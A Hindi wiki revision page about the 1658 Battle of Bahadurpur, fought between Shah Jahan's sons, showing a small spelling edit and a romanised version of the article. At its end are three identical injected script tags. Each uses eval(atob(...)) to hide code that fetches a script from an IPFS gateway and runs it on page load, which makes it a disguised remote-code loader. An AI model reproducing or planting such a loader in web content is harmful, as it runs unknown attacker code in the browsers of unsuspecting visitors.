Difference between revisions of "बहादुरपुर का युद्ध"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "फांसी" to "फाँसी")
 
Line 3: Line 3:
 
*सन 1657 में शाहजहाँ के बीमार पड़ने पर उसके चारों पुत्र [[दारा शिकोह]], [[शाहशुजा]], [[औरंगज़ेब]] व [[मुराद बख़्श]] सत्ता के लिए लड़ने लगे। दूसरे पुत्र शुजा ने तुरंत स्वयं को [[बंगाल]] का स्वतंत्र प्रशासक घोषिक कर दिया।
 
*सन 1657 में शाहजहाँ के बीमार पड़ने पर उसके चारों पुत्र [[दारा शिकोह]], [[शाहशुजा]], [[औरंगज़ेब]] व [[मुराद बख़्श]] सत्ता के लिए लड़ने लगे। दूसरे पुत्र शुजा ने तुरंत स्वयं को [[बंगाल]] का स्वतंत्र प्रशासक घोषिक कर दिया।
 
*दारा के पुत्र सुलेमान शिकोह ने शुजा को [[उत्तर प्रदेश]] में [[वाराणसी]] (भूतपूर्व [[बनारस]]) के पूर्वोत्तर में 8 किलोमीटर दूर स्थित बहादुरपुर में हरा दिया।
 
*दारा के पुत्र सुलेमान शिकोह ने शुजा को [[उत्तर प्रदेश]] में [[वाराणसी]] (भूतपूर्व [[बनारस]]) के पूर्वोत्तर में 8 किलोमीटर दूर स्थित बहादुरपुर में हरा दिया।
*सुलेमान शिकोह को बाद में उसके चाचा औरंगज़ेब ने क़ैद करके फांसी दे दी। औरंगज़ेब ने 1658 में शाहजहाँ को कैद कर एक [[महीने]] बाद स्वयं को बादशाह घोषित कर दिया। उसने दारा, मुराद और शुजा<ref>जो फ़रार होकर 1660 में [[म्यांमार]], भूतपूर्व बर्मा में मरे</ref>) को भी हराया।
+
*सुलेमान शिकोह को बाद में उसके चाचा औरंगज़ेब ने क़ैद करके फाँसी दे दी। औरंगज़ेब ने 1658 में शाहजहाँ को कैद कर एक [[महीने]] बाद स्वयं को बादशाह घोषित कर दिया। उसने दारा, मुराद और शुजा<ref>जो फ़रार होकर 1660 में [[म्यांमार]], भूतपूर्व बर्मा में मरे</ref>) को भी हराया।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 10:41, 2 January 2018

bahadurapur ka yuddh ek sangharsh tha, jo 24 pharavari, san 1658 ko hua. yah yuddh bharat ke mugal badashah shahajahaan (shasanakal:1628-57/58) ke betoan ke bich uttaradhikar ki l daee ka nirnay karane mean sahayak raha.

  • san 1657 mean shahajahaan ke bimar p dane par usake charoan putr dara shikoh, shahashuja, aurangazeb v murad bakhsh satta ke lie l dane lage. doosare putr shuja ne turant svayan ko bangal ka svatantr prashasak ghoshik kar diya.
  • dara ke putr suleman shikoh ne shuja ko uttar pradesh mean varanasi (bhootapoorv banaras) ke poorvottar mean 8 kilomitar door sthit bahadurapur mean hara diya.
  • suleman shikoh ko bad mean usake chacha aurangazeb ne qaid karake phaansi de di. aurangazeb ne 1658 mean shahajahaan ko kaid kar ek mahine bad svayan ko badashah ghoshit kar diya. usane dara, murad aur shuja[1]) ko bhi haraya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. jo farar hokar 1660 mean myaanmar, bhootapoorv barma mean mare

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>